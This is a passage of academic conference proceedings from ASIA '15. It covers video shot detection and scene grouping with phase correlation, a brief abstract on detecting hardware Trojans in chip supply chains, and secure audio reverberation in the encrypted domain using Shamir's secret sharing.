Our method uses spectral clustering to group shots together,as do some previous works on scene detection and shotgrouping [4], [2]. Spectral clustering requires some way ofmeasuring the similarity between two items. Past research onscene detection involve methods that rely, at least partially,on color similarities between scenes [2], [7]. In [2], a sceneis defined as “...a series of semantically correlated shots”.Similarly, in [7], they define a scene as “... a subdivision ofa play in which either the setting is fixed or when it presentscontinuous action in one place”. These definitions are moregeneral than ours and their similarity measures are not directlyapplicable to this problem.

Color histograms are not a reliable measure of shot simi-larity in our case, since the videos we examine tend to havedifferent scenes with a high degree of color similarity. Anotherpoint to consider is that the color content may vary greatlybetween different shots of the same scene, for instance, a

video with moving traffic. Since our definition of a scene ismore specific, we must define a different similarity measure.Temporal similarity is also taken into account in [4]. However,in our case, temporal distance is also not a good indicator ofshot similarity. Our task boils down to background matching,but it is complicated by unstable lighting conditions andforeground appearance.

III. METHOD

Phase correlation is an established method for detectinghard cuts [10], [9]. However, applying phase correlation overthe frames of a high resolution video can be computationallyexpensive. Instead we use phase correlation on a small portionof the image. We also propose using phase correlation as ameasure of similarity for grouping shots into scenes.

IV. SHOT BOUNDARY DETECTION

We define a shot as an uninterrupted segment of videotaken from the same camera direction. It is assumed thatforeground objects may change rapidly, and that changes in theforeground do not necessarily indicate a cut. The backgroundtracking technique in [5] makes use of only a portion of theimage, which they call the “fixed background area”, or FBA.This consists of a bar along the top of the image and twobars along the left and right sides of the image. These threeportions are combined into one image called the “transformedbackground area” or the TBA. This is done by rotating theleft portion clockwise and rotating the right portion counter-clockwise by ninety degrees. The process is nicely illustratedin the original paper. They also provide formulas to calculatethe exact dimensions for the FBA.

Their shot detection algorithm is a multi-stage process.In our experiments, we noted that the second stage of theiralgorithm (which is designed to filter out false positives) tendedto filter out actual cuts, likely due to the color similarity ofour shots. Better results can be obtained by skipping theirdetection method altogether and using phase correlation onthe transformed background area. This method is simple andfast, given that FFTs are only computed over a fraction ofthe image. A simple method for phase correlation applied tocut detection is given in [10]. The correlation surface can becomputed as [10]:

S(fi, fi+1) = F−1(F (f∗

i ) · F (fi+1)

| F (f∗i ) · F (fi+1) |

) (1)

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 34

where fi is the ith frame after applying a window function,∗ is the complex conjugate, and F is a 2-dimensional Fouriertransform. If fi and fi+1 are approximately the same image,there will be a high peak in the correlation surface.

They partition the images into many overlapping blocksb(k) and take:

P (fi, fi+1) = −B∑

k=1

ln(maxy,x(S(b(k)fi

, b(k)fi+1

)) (2)

For our experiments, each image was divided into fourparts, overlapping by 1

4 the total height/width of the imagein the vertical/horizontal direction, respectively. We also took1B of the sum in (2), so our thresholds don’t depend on thenumber of blocks.

Relying only on the FBA can result in false positives. Alarge moving object may occlude most of the FBA but not therest of the image. To prevent this kind of false positive, theentire image can be checked with phase correlation to confirmthe shot boundary. To summarize, the steps we use to detecta shot boundary between frames fi and fi+1 are:

1) Compute the TBAs: ti, ti+1 for frames fi, fi+1.2) If P (ti, ti+1) > T then there is a potential cut at i3) If P (fi, fi+1) > T then there is a cut at i.

where T is a threshold.

V. GROUPING

Individual shots should be grouped according to the cameradirection from which they were taken. Each output videowould then consist of multiple shots with the same back-ground.

Spectral clustering can be used to group different shotstogether [4], [2]. However, instead of using colors to compareshots, we use phase correlation. The whole frames of eachshot (as opposed to just the TBAs) are used, after beingdown-sampled as suggested in [9]. The mean of each shotis computed and used as a representative for that shot.

We need a measure of similarity, rather than measure ofdissimilarity, so we take:

Ps(mi,mj) = −1

B

B∑k=1

ln(1−maxy,x(S(b(k)mi

, b(k)mj))) (3)

where mi and mj are the means of the ith and jth shots.

We can also adjust this value according to the coordinatesof the peak in the correlation surface. Since the camera shouldbe still during each shot, if the peak is far from (0, 0), then wedo not consider these images similar. The similarity measurecan be multiplied by:

D(mi,mj) = exp(−||argmaxy,xS(mi,mj)||

C)) (4)

where C is some constant.

Or, since we use several blocks:

Db(mi,mj) =1

B

B∑k=1

D(bkmi, bkmj

) (5)

Using the spectral clustering algorithm found in [3] alongwith our similarity measure we follow these steps to computethe clusters of shots. The number of clusters can be estimatedusing the method from [11]. Let {m1,m2, . . . ,mn} be themean of each shot.

The algorithm:

1) Let Ai,j = Ps(mi,mj) ·Db(mi,mj)2) Let L = D−1/2AD−1/2 where Di,i =

∑j

Ai,j

3) Find the eigenvalues and eigenvectors of L.4) Create another matrix X using the corresponding

eigenvectors as columns. Normalize the rows of Xto get Y. Use k-means++ to cluster the rows of Y . 1

5) The clusters for elements mj ∈ {m1,m2, . . . ,mn}corresponds to the clusters for rows Yj ∈ Y

VI. EXPERIMENTS

We tested this method on a group of videos taken by PTZcameras. These cameras switched between a set of directionson a schedule. For instance, a camera may rotate clockwiseby ninety degrees every few seconds, producing a video withfour scenes. The transitions between camera directions arenearly instantaneous, i.e. the camera rapidly changes directionsrather than slowly panning to the next position. Nearly all hardcuts were detected and nearly all shots were grouped into thecorrect scene.

We always down-sampled images (both TBAs and wholeframes) to one quarter their original size before applying phasecorrelation. We use the formulas in [5] to calculate the FBAdimensions, however we start with 1

8 the image width insteadof 1

10 , resulting in a slightly larger TBA. On our 640 × 480resolution videos, the cut detection works in real time (usingFFTW to compute the FFTs). Of course, calculating the affinitymatrix becomes slow for videos with many shots. Processinglong videos in shorter segments and matching the resultingscenes may be a possibility.

Fig. 1 illustrates the results of performing phase correlationon TBAs and on the whole frames. The spikes in the graphindicate shot transitions. Using the TBA instead of the wholeframe typically produces results that are at least as accurate. Itis also interesting to look at the similarity between the mean ofa shot and the means of the other shots in a video. Fig. 2 showsthe results of such a comparison (we used a larger portionof the video for this figure). Phase correlation and histogramcorrelation were used for fig. 2a and 2b respectively.

We hand-labeled the cuts on six PTZ camera videos and ranthe detection algorithm. The results can be seen in Table I. Thevideos were taken by cameras on a schedule and switched fromone direction to the next every few seconds. The transitionsbetween camera directions were brief, but in some cases lasted

1The k-means++ algorithm (see [1]) produced better results than ordinaryk-means. In [2], they also use a modified version of k-means.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 35

(a) TBAs (b) Whole Frames

Fig. 1. P (fi, fi+1) for one of our test videos

(a) Phase Correlation (b) Histogram Correlation

Fig. 2. P (fi, fi+1) for one of our test videos

TABLE I. CUT DETECTION RESULTS

Video 1 2 3 4 5 6

Frames 1801 144 2399 1357 899 1370

Actual Cuts 99 21 62 86 124 129

Reported Cuts 103 21 68 90 122 128

False Positives 5 1 7 9 6 12

False Negatives 1 1 1 5 8 14

Precision 95.1% 95.2% 89.7% 90.0% 95.1% 90.6%

Recall 99.0% 95.2% 98.4% 94.2% 93.5% 89.1%

Major False Positives 0 0 4 5 0 6

Major False Negatives 0 0 0 0 0 2

Adjusted Precision 100.0% 100.0% 93.8% 94.2% 100.0% 95.0%

Adjusted Recall 100.0% 100.0% 100.0% 100.0% 100.0% 98.3%

several frames. Each frame that the camera is moving orzooming was labeled as a cut. In some cases it was difficultto decide whether a frame should be a cut or not. We define a“Major False Positive” as a false positive that does not occurwithin one frame of an actual cut and a “Major False Negative”as a false negative that does not occur within one frame of areported cut. In other words, the false positives and negativesnot counting off-by-one errors.

VII. CONCLUSION

We have presented a method for dividing videos into shotsand grouping shots with identical backgrounds into scenes.This method addresses a case not previously considered andperforms well. Future work may focus on achieving real-timeperformance and possibly adapting the method to work on amore general set of videos.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 36

REFERENCES

[1] David Arthur and Sergei Vassilvitskii. k-means++: Theadvantages of careful seeding. In Proceedings of theeighteenth annual ACM-SIAM symposium on Discretealgorithms, pages 1027–1035. Society for Industrial andApplied Mathematics, 2007.

[2] Vasileios T Chasanis, CL Likas, and Nikolas P Galat-sanos. Scene detection in videos using shot clusteringand sequence alignment. Multimedia, IEEE Transactionson, 11(1):89–100, 2009.

[3] Andrew Y Ng, Michael I Jordan, Yair Weiss, et al. Onspectral clustering: Analysis and an algorithm. Advancesin neural information processing systems, 2:849–856,2002.

[4] Jean-Marc Odobez, Daniel Gatica-Perez, and MaelGuillemot. Spectral structuring of home videos. In Imageand Video Retrieval, pages 310–320. Springer, 2003.

[5] JungHwan Oh, Kien A Hua, and Ning Liang. Content-based scene change detection and classification techniqueusing background tracking. In Electronic Imaging, pages254–265. International Society for Optics and Photonics,1999.

[6] Yael Pritch, Alex Rav-Acha, and Shmuel Peleg.Nonchronological video synopsis and indexing. PatternAnalysis and Machine Intelligence, IEEE Transactionson, 30(11):1971–1984, 2008.

[7] Zeeshan Rasheed and Mubarak Shah. Detection andrepresentation of scenes in videos. Multimedia, IEEETransactions on, 7(6):1097–1105, 2005.

[8] Raahat Devender Singh and Naveen Aggarwal. Novelresearch in the field of shot boundary detection–a survey.In Advances in Intelligent Informatics, pages 457–469.Springer, 2015.

[9] Oguzhan Urhan, M Kemal Gullu, and Sarp Erturk. Mod-ified phase-correlation based robust hard-cut detectionwith application to archive film. Circuits and Systemsfor Video Technology, IEEE Transactions on, 16(6):753–770, 2006.

[10] Theodore Vlachos. Cut detection in video sequencesusing phase correlation. Signal Processing Letters, IEEE,7(7):173–175, 2000.

[11] Lihi Zelnik-Manor and Pietro Perona. Self-tuning spec-tral clustering. In Advances in neural information pro-cessing systems, pages 1601–1608, 2004.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 37

Securing against Malicious Hardware Trojans

Sanjay Goel School of Business

University at Albany, SUNY

Albany, New York

John Hartley Nanoengineering Constellation

Colleges of Nanoscale Science

and Engineering

Albany, New York

Yuan Hong School of Business

University at Albany, SUNY

Albany, New York

ARDWARE Trojans are malicious components of integrated circuits that are inserted into chips during the design and

fabrication process. These Trojans can make the chip fail at critical moments, generate false signals or create a backdoor

that helps in stealing information. Hardware Trojans have existed for at least a decade and an oft-cited example is the failure of

Syrian radars of an incoming airstrike through a backdoor inserted into the radar chip. The architecture of the chips is very

complex resulting in an intricate supply chain where multiple parties are involved in the design and fabrication of chips;

consequently, there are multiple vulnerable points where hardware Trojans can be inserted. There is ongoing research on

identifying Trojans in the hardware through testing of properties of the chips or at the design level by examining the integrity

of the design at different stages. In this paper, we lay out the design and manufacturing processes of the chips and discuss the

vulnerabilities in the process that can lead to compromise of the chips. We also discuss the current research in detection of

hardware Trojans and securing the design. Finally, we lay out a research agenda for the future.

The full version will be made available online through the ASIA website at: http://www.albany.edu/iasymposium

H

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 38

Secure Audio Reverberation over Cloud

M. Abukari YakubuDepartment of Applied Computer Science

University of WinnipegWinnipeg, MB, Canada

Email: [email protected]

Pradeep K. AtreyDepartment of Computer Science

University at Albany, SUNYAlbany, NY, USA

Email: [email protected]

Namunu C. MaddageNextGmultimedia

Melbourne, AustraliaEmail: [email protected]

Abstract—Most individuals, governments and companies whooutsource audio content to Cloud Data Centers (CDCs) for stor-age also make use of their high-end computing services. However,security and privacy issues related to CDCs make it difficult fordata to be processed without compromising security. In this work,we propose a secure method for artificially adding reverberationeffects to an audio secret over cloud with (K,N) Shamir’sSecret Sharing (SSS) as the cryptosystem for audio recording,reproduction, editing and enhancement. Our method implementsconvolution reverb in encrypted domain by convolving a modeledimpulse response of an acoustic space with shares of the audiosecret. Experimental results show that our proposed method inEncrypted Domain (ED) produces similar results as compared toperforming the same operations in Plaintext Domain (PD).

Keywords—Encrypted domain processing, cloud security, audioreverberation effect, convolution reverb, Shamir’s secret sharingscheme (SSS).

I. INTRODUCTION

With the advent of cloud computing, which provides aframework of services for data storage, high-end computingand online access to computer resources, companies are savingcost and slashing investment on resources by outsourcingstorage and processes to Cloud Service Providers (CSP).Audio content is one type of data outsourced to CDCs forstorage and computing services by individuals, governmentsand companies such as the audio recording and reproductionindustries (record labels) and forensic analytical providers, etc.Most of these recordings are confidential and might containsensitive information like names, credit cards, evidence to beused in a court of law by a jury, information with nationalsecurity implications, etc.

Because of the security and privacy issues of using third-party servers like CDCs, companies first encrypt confidentialaudio content before uploading it to CDCs. In such cases,encryption schemes like Advanced Encryption Standard (AES)are used, which suffers from single point vulnerability, mean-ing that the security of the method lies in securing the encryp-tion key which is usually entrusted to the sender and receiver.Thus an adversary with access to the encryption key canobtain the confidential data. Most companies use not only CSPstorage services, but also high-end computing services. Whenthe need arises for some processing to be performed on theseaudio secrets, the third-party server will first have to decryptthe secret which will expose the confidential information. Thismakes the confidential data vulnerable to exploitation by anadversary. In the case of sound recording companies (e.g.record labels) millions of dollars might be lost if a record

in production is exposed. Hence, secure processing of suchconfidential audio is of utmost importance.

In order to perform processing in ED over cloud, encryptedsignals have to be processed without decryption. This way,the security of the audio secret is not compromised. To thisend, fields in signal processing and cryptography have beenmerged to develop a totally new interdisciplinary frameworkcalled Signal Processing in Encrypted Domain (SPED)[1].Work done so far in this area has applied cryptographicprimitives such as Secure Multiparty Computation (SMC),Commitment Schemes, Zero-knowledge Protocols (ZKP), Pri-vate Information Retrieval and homormophic encryption todevelop schemes based on the security requirements of theapplication scenario to make secure signal processing possible.SPED has been applied in applications such as secure pro-cessing of medical data (MRI, ECG, DNA) [2], secure digitalwatermarking [3], Data mining on private databases [4], [5],Protecting Privacy in video surveillance systems [6]. etc.

Although some work has been done in SPED for images,videos etc., it has been scarcely explored in audio. TableI details the comparison of work on audio processing inencrypted domain. The authors in [7], [8] propose a tech-nique to identify and verify speakers over encrypted voiceover IP (VoIP) conversations. Here, Variable Bit Rate (VBR)and Voice Activity Detector (VAD) used to encode speechover a VoIP channel achieves lower bit rates but producesa packet-length which is dependent on the speaker. Whereasthe authors in [7] employ VBR encoding, the authors in [8]use the Voice Activity Detector approach. Both works usethis speaker dependent packet-length information extractedfrom encrypted VoIP signals to build models for identificationand verification. The authors of [9] and [10] also presenta framework for speaker verification/identification and soundrecognition/classification, respectively, using Gaussian MixtureModels (GMM) in encrypted domain. Both methods are basedon SMC and homomorphic encryption [like the Paillier cryp-tosystem and BGN cryptosystem] which enables computationand classification to be performed in a secure manner. Theframework in [9] enables computation on encrypted speechdata without revealing the actual voice patterns in plaintext.The framework in [10] involves two parties (party A andparty B), party A providing the data and party B providingthe recognition algorithm (classifier). Party B then applies hisclassification algorithm to party A’s data in such a way that thedata and results are not revealed to party B, thereby maintain-ing the privacy of the data. The security of these systems lies inprotecting the encryption and decryption keys as an adversarywith access to the keys can obtain the plaintext data. Moreover,

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 39

TABLE I: Comparison of Work on Audio Processing inEncrypted Domain

Scheme Task in EncryptedDomain

CryptographicPrimitive

TechniquesUsed

[7]

Speaker identification andverification over encryptedvoice over IP (VoIP) conver-sations

AES

Variable BitRate (VBR) andhidden Markovmodels (HMMs)

[8]

Speaker identification andverification over encryptedvoice over IP (VoIP) conver-sations

AES Voice ActivityDetector (VAD)

[9] Speaker verification / iden-tification

SMC andhomomorphicencryption

GaussianMixture Models(GMM)

[10] Sound recognition / classifi-cation

SMC andhomomorphicencryption

GaussianMixture Models(GMM)

ProposedScheme Addition of reverb effect

Homomorphicencryption(SSS)

Convolutionwith modeledreverb impulseresponse

these methods are computationally expensive as a result of thelarge message space (1024 bits) and exponentiation operationof the Paillier cryptosystem.

In this work, we focus on the addition of reverb effectsto an audio recording in ED over cloud. This is one of themost widely used delay effects, amongst others like flanging,phasing, chorus effects etc., for audio recording, reproduction,editing and enhancement. This effect adds an acoustic envi-ronment to an audio recording to make it sound realistic. Theresulting reverb effected audio inherits characteristics fromthat acoustic environment and sounds as if the recordingwas created in that environment. Reverberation is a seriesof delayed and attenuated sound waves reflected within anacoustic environment which is perceived by the human ear inless than 0.1 seconds after the original sound wave. The humanauditory system is unable to perceive the 0.1 second delay andinterprets the original sound wave and delayed reflections asone prolonged sound. This effect is different from echo wheredelays are more than 0.1 seconds and the delayed sounds areperceived distinctly as decaying copies of the original sound.Key areas of applications of reverb effects in audio are:

1) The recording industry for audio production, editingand enhancement.

2) Audio forensics for analyzing/simulating an audiorecording in different acoustic environments.

3) Simulation of acoustic reverberation for dereverbera-tion algorithms, etc.

In order to protect an audio secret to 1) eliminate singlepoint vulnerability of widely used AES, 2) avoid large messagespace and high computational complexity of homormophicschemes like the Paillier cryptosystem and 3) make processingon the encrypted audio secret possible, we employ Shamir’sSecret sharing (SSS) to encrypt the secret into a number ofshares that can be distributed among a number of CDCs suchthat only more than a certain number of shares can be retrievedby an authorized user to reconstruct the secret; individualshares are of no use on their own. The homormophic property(addition and multiplication) of SSS makes ED processing

possible. Furthermore, SSS is information theoretically secureand (K,N) threshold.

In this work, we propose the implementation of convolutionreverb to artificially add reverb effects to an encrypted audiosecret over cloud to ensure information assurance of client’sdata from a privacy and security perspective. To the best ofour knowledge, this is the first work that applies reverb effectto an audio signal in the encrypted domain.

The rest of this paper is organized as follows. In SectionII, we discuss Shamir’s secret sharing scheme. We discussartificial reverberation techniques in Section III. The proposedmethod for encrypted domain convolution reverb is detailed inSection IV, and Section V discusses the experimental results.We conclude the paper in Section VI.

II. SSS SCHEME

Shamir introduced his scheme in 1979 [11]. His scheme isbased on polynomial interpolation. The goal of this scheme isto divide data into N shares such that:

1) Any K or more shares can reconstruct the secret.2) K − 1 or fewer shares cannot reconstruct the secret.

Such a scheme is called a (K,N) threshold scheme where2 ≤ K ≤ N , N is the number of shares and K is the leastnumber of shares required to reconstruct the secret.To share a secret S among N participants, a polynomialfunction f(x) is constructed with degree of K − 1 usingK random coefficients a1, a2 . . . ak−1 in a finite field GF (q)where a0 is S, and q is a prime number > a0.

f(x) = (a0 + a1x+ · · ·+ aK−1xK−1)mod q (1)

Any K out of N shares can reconstruct the secret usingLagrange interpolation to reconstruct the polynomial f(x); thesecret can be obtained at f(0) i.e. f(0) = a0 = S

f(x) =K∑j=1

yj K∏i=1,i6=j

(x− xixj − xi

)mod q (2)

A. Homomorphic Encryption

A cryptosystem is homomorphic if computation on itsciphertext yields an encrypted result, which when decryptedwill match the result of the computation on its plaintext. SSSis homomorphic on addition and multiplication. Let m1 andm2 belong to the plaintext space of some cryptosystem, andE(.) and D(.) denote the encryption and decryption functionsrespectively. Then SSS satisfies the conditions below:

D(E(m1) + E(m2)

)= m1 +m2 (3)

D(E(m1)× E(m2)

)= m1 ×m2 (4)

Examples of additive homomorphic cryptosystems are Paillier[12] and Benaloh [13], and multiplicative homomorphic cryp-tosystems are RSA [14] and ElGamal [15].

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 40

III. ARTIFICIAL REVERBERATION TECHNIQUES

There are many techniques for applying reverb effects toaudio. The most common techniques for artificial addition ofreverb are:1) Filter banks and delay line: this approach involves connect-ing filters (comb, all-pass, lowpass filters) in parallel and seriesand adjusting their parameters to produce the desired reverbeffect, e.g. Schroeders Reverberator [16], Moorers Reverbera-tor [17] etc.2) Convolution reverb: acoustic space is a Linear Time-Invariant (LTI) system, and like any LTI system its impulseresponse can be modeled and convolved with an audio signalto produce the effects of that space. Modeling of the impulseresponse depends on the application scenario and needs ofthe designer which is beyond the scope of this paper. Someexamples of modeled impulse responses are room, concert hall,cathedral, bottle hall, conic long echo hall, deep space, etc. Inthis work, we apply this approach to artificially add reverbeffect to an audio secret in ED. Let h[n] be the modeledimpulse response and x[n] be the audio signal. Then, belowdiscrete convolution will yield the reverb effected signal y[n].

y[n] = x[n] ∗ h[n] =∞∑

k=−∞

x[k]h[n− k] (5)

IV. PROPOSED WORK

The audio secret to be reverb effected is encrypted bycreating shares with the SSS (K,N) threshold scheme on theclient’s system. The client then uploads each of the N sharesto N different non-colluding CDCs. The CDC then applies thereverberation effect to their hosted shares by convolving withthe desired impulse response. Reverb impulse responses arepublic signals in plaintext. The client does not need to transmitor upload impulses response to the CDC since the CSP canobtain a library of all impulse responses. An authorized userthen reconstructs the reverb effected secret by combining atleast K out of N processed shares.

Signal processing operations often involve real-valued sig-nal amplitudes; however, using real numbers in a cryptosystemmeans excluding the modular prime operation, which in thecase of SSS, degrades security. Therefore, we have to prepro-cess the real valued samples of the audio secret to positiveinteger values. Steps 1 and 2 below preprocesses the originalsignal before creating shares. The below steps details ourmethod in ED.

Step 1: Scale real-valued signal amplitudes with constant factor10d where d is an integer value. Roundoff error is boundedby:

−1

2× 101−d ≤ ε ≤ 1

2× 101−d (6)

where ε is the rounding error and d is the rounding precision.

Step 2: Shift signal obtained from equation (6) to first quadrantby a constant additive shift γ to avoid negative numbers.

A′ =((A+ ε)× 10d

)+ γ (7)

Step 3: Create N shares (S1, S2 . . . SN ∈ S) of preprocessedsignal A′ using Equation (1) of SSS in the finite field of q

where q > max(A′). Upload the N shares to N non-colludingCDCs.

Step 4: Convolution of each share on the CDC. The modeledimpulse response is real-valued and there are instances wheresome samples are negative. This might result in errors whileperforming convolution reverberation. In order to avoid errors,perform the following steps:1) Scale impulse response h by 10t that is h′ = h×10t; wheret is an integer value.2) Modify Equation (5) by adding a constant additive shift βto avoid negative samples. β = d q2e if h′ has a negative sampleelse β = 0, where d.e is a ceiling function.Convolve each share (S1, S2 . . . SN ∈ S) with h′ usingEquation (8) to obtain (S′1, S

′2 . . . S

′N ∈ S′).

S′i[n] =

((Si[n] ∗ h′[n]

)+ β

)modq

=

(( L−1∑k=0

Si[k]h′[n− k]

)+ β

)modq , i ∈ {1, 2 . . . N}

(8)

Where L is the number of samples of each share.

Step 5: An authorized user can reconstruct the reverbeffected secret by putting together K processed shares fromany of the N CDCs using Lagrange interpolation fromEquation (2).

Step 6: Postprocess the reconstructed secret to reverseengineer the preprocessing done in the above steps. 1)Subtract the additive shift β and divide by the scale factor ofh′ which is 10t. 2)Subtract the additive shift γ and divide bythe scale factor 10d from equations (7) and (6) respectively.

A. Data Overhead

Our proposed scheme introduces some data overhead dueto the preprocessing steps before creating shares. This dataoverhead is the number of bits used to represent the max-imum preprocessed audio sample which is the same as thetransmission overhead of each share to the CDC. Since sharesare generated under a finite field bounded by the modulo primeq, we can conclude that the data overhead to transmit a share toeach CDC is also bounded by the number of bits representingq.

B. Security Analysis

The proposed method is based on the SSS (K,N) thresholdscheme which is proven to be information theoretically secure[18]. Since the generation of shares is bounded by q, it followsthat samples of each share are within the set {0, 1, 2, ..., q−1}and, referring to equation (1) of SSS, each sample of a shareis a unique polynomial. In this case, an adversary will haveto guess with a probability of 1

q making it highly unlikely toinfer a secret sample from its share.

Audio signals, by nature, have correlating adjacent sam-ples. This correlation reduces the entropy (degree of uncer-tainty) of the entire signal; i.e. a sample can be predicted from

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 41

TABLE II: Data set

Test File (.wav) Length (secs) Bits/Sample Sampling Frequency (Hz)audio1 2 16 16000

audio2 43 16 8000

audio3 13 16 11025

audio4 14 8 44100

audio5 4 8 8000

audio6 2 32 8000

TABLE III: Average Processing Time (ms)

Test file Share Creation ED Processing Reverb Effected SecretReconstruction

audio1 205.18 97.77 17.81

audio2 1620.27 631.44 80.32

audio3 747.46 276.57 39.58

audio4 2802.95 1068.85 115.98

audio5 219.06 73.21 18.64

audio6 149.20 44.26 15.02

its adjacent samples as in Linear Predictive Coding (LPC).However, the use of random coefficients as a blinding factorin Equation (1) to generate shares eliminates this correlation.Thus, individual shares do not reveal information about thesecret audio. In the future we hope to examine the informationtheoretical security implications of our scheme with respect tothe preprocessing steps.

V. EXPERIMENTAL RESULTS

Table II details the test audio files obtained from [19] thatwe used for experimenting with our proposed method. We testour method with a modeled impulse response [20] from theacoustic environment of a living room. That is, we add theeffects of a living room to our audio test files in ED. In the(K,N) threshold SSS scheme, we set K = 2 and N = 3,implying that we created three shares of the audio secret suchthat at least two shares will be required to reconstruct thereverb effected audio secret.

We implemented the proposed method using MATLAB14on a 2.53GHz i5 CPU with 4GB RAM. Table III detailsthe processing time for creating secret shares, applying thereverberation effect in encrypted domain and reconstructingthe audio secret. The table suggests that the complexity ofreconstructing the secret is relatively lower than creating sharesand ED processing. Our method is applied on a sample basis.As a result, the processing time is directly proportional to theaudio bit rate, which is associated with the sampling frequencyand number of bits per sample. Therefore, the greater thelength of the signal, the greater the complexity. This is evidentfor audio2.wav and audio4.wav with the greatest complexities.

Fig. 1 shows similarity scores between the PD and EDreverb effected signals. We computed the similarities usingPearson’s correlation method. Results suggest the reverb ef-fected signal, after applying our method, correlates about99.99% with normal PD processing. Thus, our method yieldsidentical results to PD processing while maintaining securityand privacy. The 0.01% difference can be accounted for by therounding-off during the preprocessing steps for both originalaudio secret A and impulse response h. We hope to optimizethe solution in the future to further minimize round-off errors.

Fig. 1: Similarity Score between PD and ED processing

0 200 400 600 800 1000−0.3

−0.2

−0.1

0

0.1

0.2

0.3

0.4

0.5

Time(sec)

Ampl

itude

Fig. 2: Modeled room impulse response

0 0.5 1 1.5 2 2.5 3 3.5

x 104

−1

−0.5

0

0.5

1

Time(sec)

Ampl

itude

(a) audio secret

0 0.5 1 1.5 2 2.5 3 3.5

x 104

0

0.2

0.4

0.6

0.8

1

Time(sec)

Ampl

itude

(b) 1st share

0 0.5 1 1.5 2 2.5 3 3.5

x 104

−0.4

−0.3

−0.2

−0.1

0

0.1

0.2

0.3

0.4

Time(sec)

Ampl

itude

(c) reconstructed reverb effected audio

Fig. 3: Time domain plots of audio1.wav

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 42

Time domain plots of audio1.wav are represented in fig.3 showing the audio secret, one of its shares and the reverbeffected reconstructed secret. The time series reveals that 1)the share is noise and likely to have equal power across allfrequencies and 2) the amplitude series of the reverb effectedreconstructed secret shows some low amplitude regions ascompared to the audio secret. This is as a result of the delayand decay effect of the impulse response shown in fig. 2, whichverifies that the audio secret has been reverb effected.

VI. CONCLUSION

The use of Cloud computing is growing on a continuousbasis. In order for governments and companies to entrustcomputation of their data to Cloud Service Providers (CSP),security issues should be paid much attention. Though there arepolicies governing the operations of CSPs, this is not enough toguarantee the security and privacy of data. Researchers in thefields of mathematics, computer science and engineering arecurrently developing encryption protocols and computationaltasks possible in Encrypted Domain (ED). Only then will CSPservices be fully embraced without fear of security or privacyissues. As a contribution to realize this, we have proposed inthis work a secure artificial addition of reverb effect to an audiosecret over cloud by using (K,N) Shamir’s secret sharing(SSS) scheme as our cryptosystem. Our method implementsconvolution reverb and can be applied to any reverb impulseresponse and an audio secret in ED over cloud. Experimentalresults reveal that our proposed method is efficient and yieldssimilar results to Plaintext Domain (PD).

REFERENCES

[1] u. d. V. GPSC, “signal processing encrypted domain,” 2014.[Online]. Available: http://webs.uvigo.es/gpscuvigo/?q=content/signal-processing-encrypted-domain

[2] M. Barni, P. Failla, V. Kolesnikov, R. Lazzeretti, A.-R. Sadeghi, andT. Schneider, “Secure evaluation of private linear branching programswith medical applications,” in Proceedings 14th European Symposiumon Research in Computer Security - ESORICS, ser. LNCS, vol. 5789.Springer, 2009, pp. 424–439.

[3] A. Piva, T. Bianchi, and A. D. Rosa, “Secure client-side st-dm wa-termark embedding,” IEEE Transactions on Information Forensics andSecurity, vol. 5, no. 1, pp. 13–26, 2010.

[4] W. Lu, A. Swaminathan, A. L. Varna, and M. Wu, “Enabling search overencrypted multimedia databases,” in Proceedings of the InternationalSociety for Optics and Photonics, Media Forensics and Security, ser.SPIE, vol. 7254, 2009.

[5] M. Malik, M. Ghazi, and R. Ali, “Privacy preserving data mining tech-niques: Current scenario and future prospects,” in Third InternationalConference on Computer and Communication Technology (ICCCT).IEEE, 2012, pp. 26–32.

[6] H. Sohn, K. N. Plataniotis, and Y. M. Ro, “Privacy-preserving watchlist screening in video surveillance system,” in Advances in MultimediaInformation Processing, ser. LNCS, vol. 6297. Springer, 2010, pp.622–632.

[7] L. Khan, M. Baig, and A. M. Youssef, “Speaker recognition fromencrypted voip communications,” in Digital Investigation, vol. 7. El-sevier, 2010, pp. 65–73.

[8] M. Backes, G. Doychev, M. Durmuth, and B. Kopf, “Speaker recog-nition in encrypted voice streams,” in Computer Security - ESORICS,ser. LNCS, vol. 6345. Springer, 2010, pp. 508–523.

[9] M. Pathak and B. Raj, “Privacy-preserving speaker verification andidentification using gaussian mixture models,” IEEE Transactions ofAudio, Speech, and Language Processing, vol. 21, pp. 397–406, Febuary2013.

[10] M. V. S. Shashanka and P. Smaragdis, “Secure sound classifica-tion: Gaussian mixture models,” in IEEE International Conference onAcoutiscs, Speech and Signal Processing (ICASSP), vol. 3. IEEE,2006.

[11] A. Shamir, “How to share a secret,” Communications of the ACM,vol. 22, pp. 612–613, November 1979.

[12] P. Paillier, “Public-key cryptosystems based on composite degree resid-uosity classes,” in Advances in Cryptology - EUROCRYPT ’99, ser.Lecture Notes in Computer Science, vol. 1592. Springer, 1999, pp.223–238.

[13] J. Benaloh, “Verifiable secret-ballot elections,” Ph.D. dissertation, YaleUniversity, New Haven, CT, USA, 1988.

[14] R. L. Rivest, A. Shamir, and L. Adleman, “A method for obtainingdigital signatures and public-key cryptosystems,” Communications ofthe ACM, vol. 21, no. 2, pp. 120–126, Febuary 1978.

[15] T. ElGamal, “A public key cryptosystem and a signature scheme basedon discrete logarithms,” in Advances in Cryptology - CRYPTO ’84, ser.Lecture Notes in Computer Science, vol. 196. Springer, 1985, pp.10–18.

[16] M. R. Schroeder, “Natural sounding artificial reverberation,” in Journalof the Audio Engineering society, vol. 10, 1962, pp. 219–223.

